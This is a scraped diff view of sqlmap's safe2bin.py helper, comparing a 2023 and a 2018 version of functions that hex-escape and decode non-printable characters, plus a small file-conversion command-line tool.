#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -1,25 +1,20 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
safe2bin.py - Simple safe(hex) to binary format converter
|
||||||
|
|
||||||
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import binascii
|
import binascii
|
||||||
import re
|
import re
|
||||||
import string
|
import string
|
||||||
|
import os
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
PY3 = sys.version_info >= (3, 0)
|
from optparse import OptionError
|
||||||
|
from optparse import OptionParser
|
||||||
if PY3:
|
|
||||||
xrange = range
|
|
||||||
text_type = str
|
|
||||||
string_types = (str,)
|
|
||||||
unichr = chr
|
|
||||||
else:
|
|
||||||
text_type = unicode
|
|
||||||
string_types = (basestring,)
|
|
||||||
|
|
||||||
# Regex used for recognition of hex encoded characters
|
# Regex used for recognition of hex encoded characters
|
||||||
HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})"
|
HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})"
|
||||||
@@ -28,7 +23,7 @@ HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})"
|
|||||||
SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c"
|
SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c"
|
||||||
|
|
||||||
# Characters that don't need to be safe encoded
|
# Characters that don't need to be safe encoded
|
||||||
SAFE_CHARS = "".join([_ for _ in string.printable.replace('\\', '') if _ not in SAFE_ENCODE_SLASH_REPLACEMENTS])
|
SAFE_CHARS = "".join(filter(lambda _: _ not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', '')))
|
||||||
|
|
||||||
# Prefix used for hex encoded values
|
# Prefix used for hex encoded values
|
||||||
HEX_ENCODED_PREFIX = r"\x"
|
HEX_ENCODED_PREFIX = r"\x"
|
||||||
@@ -43,25 +38,23 @@ def safecharencode(value):
|
|||||||
"""
|
"""
|
||||||
Returns safe representation of a given basestring value
|
Returns safe representation of a given basestring value
|
||||||
|
|
||||||
>>> safecharencode(u'test123') == u'test123'
|
>>> safecharencode(u'test123')
|
||||||
True
|
u'test123'
|
||||||
>>> safecharencode(u'test\x01\x02\xaf') == u'test\\\\x01\\\\x02\\xaf'
|
>>> safecharencode(u'test\x01\x02\xff')
|
||||||
True
|
u'test\\01\\02\\03\\ff'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
retVal = value
|
retVal = value
|
||||||
|
|
||||||
if isinstance(value, string_types):
|
if isinstance(value, basestring):
|
||||||
if any(_ not in SAFE_CHARS for _ in value):
|
if any([_ not in SAFE_CHARS for _ in value]):
|
||||||
retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER)
|
retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER)
|
||||||
retVal = retVal.replace('\\', SLASH_MARKER)
|
retVal = retVal.replace('\\', SLASH_MARKER)
|
||||||
|
|
||||||
for char in SAFE_ENCODE_SLASH_REPLACEMENTS:
|
for char in SAFE_ENCODE_SLASH_REPLACEMENTS:
|
||||||
retVal = retVal.replace(char, repr(char).strip('\''))
|
retVal = retVal.replace(char, repr(char).strip('\''))
|
||||||
|
|
||||||
for char in set(retVal):
|
retVal = reduce(lambda x, y: x + (y if (y in string.printable or isinstance(value, unicode) and ord(y) >= 160) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)())
|
||||||
if not (char in string.printable or isinstance(value, text_type) and ord(char) >= 160):
|
|
||||||
retVal = retVal.replace(char, '\\x%02x' % ord(char))
|
|
||||||
|
|
||||||
retVal = retVal.replace(SLASH_MARKER, "\\\\")
|
retVal = retVal.replace(SLASH_MARKER, "\\\\")
|
||||||
retVal = retVal.replace(HEX_ENCODED_PREFIX_MARKER, HEX_ENCODED_PREFIX)
|
retVal = retVal.replace(HEX_ENCODED_PREFIX_MARKER, HEX_ENCODED_PREFIX)
|
||||||
@@ -77,13 +70,13 @@ def safechardecode(value, binary=False):
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
retVal = value
|
retVal = value
|
||||||
if isinstance(value, string_types):
|
if isinstance(value, basestring):
|
||||||
retVal = retVal.replace('\\\\', SLASH_MARKER)
|
retVal = retVal.replace('\\\\', SLASH_MARKER)
|
||||||
|
|
||||||
while True:
|
while True:
|
||||||
match = re.search(HEX_ENCODED_CHAR_REGEX, retVal)
|
match = re.search(HEX_ENCODED_CHAR_REGEX, retVal)
|
||||||
if match:
|
if match:
|
||||||
retVal = retVal.replace(match.group("result"), unichr(ord(binascii.unhexlify(match.group("result").lstrip("\\x")))))
|
retVal = retVal.replace(match.group("result"), (unichr if isinstance(value, unicode) else chr)(ord(binascii.unhexlify(match.group("result").lstrip("\\x")))))
|
||||||
else:
|
else:
|
||||||
break
|
break
|
||||||
|
|
||||||
@@ -93,11 +86,45 @@ def safechardecode(value, binary=False):
|
|||||||
retVal = retVal.replace(SLASH_MARKER, '\\')
|
retVal = retVal.replace(SLASH_MARKER, '\\')
|
||||||
|
|
||||||
if binary:
|
if binary:
|
||||||
if isinstance(retVal, text_type):
|
if isinstance(retVal, unicode):
|
||||||
retVal = retVal.encode("utf8", errors="surrogatepass" if PY3 else "strict")
|
retVal = retVal.encode("utf8")
|
||||||
|
|
||||||
elif isinstance(value, (list, tuple)):
|
elif isinstance(value, (list, tuple)):
|
||||||
for i in xrange(len(value)):
|
for i in xrange(len(value)):
|
||||||
retVal[i] = safechardecode(value[i])
|
retVal[i] = safechardecode(value[i])
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
def main():
|
||||||
|
usage = '%s -i <input file> [-o <output file>]' % sys.argv[0]
|
||||||
|
parser = OptionParser(usage=usage, version='0.1')
|
||||||
|
|
||||||
|
try:
|
||||||
|
parser.add_option('-i', dest='inputFile', help='Input file')
|
||||||
|
parser.add_option('-o', dest='outputFile', help='Output file')
|
||||||
|
|
||||||
|
(args, _) = parser.parse_args()
|
||||||
|
|
||||||
|
if not args.inputFile:
|
||||||
|
parser.error('Missing the input file, -h for help')
|
||||||
|
|
||||||
|
except (OptionError, TypeError), e:
|
||||||
|
parser.error(e)
|
||||||
|
|
||||||
|
if not os.path.isfile(args.inputFile):
|
||||||
|
print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
f = open(args.inputFile, 'r')
|
||||||
|
data = f.read()
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
if not args.outputFile:
|
||||||
|
args.outputFile = args.inputFile + '.bin'
|
||||||
|
|
||||||
|
f = open(args.outputFile, 'wb')
|
||||||
|
f.write(safechardecode(data))
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main()
|
||||||
Binary file not shown.
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user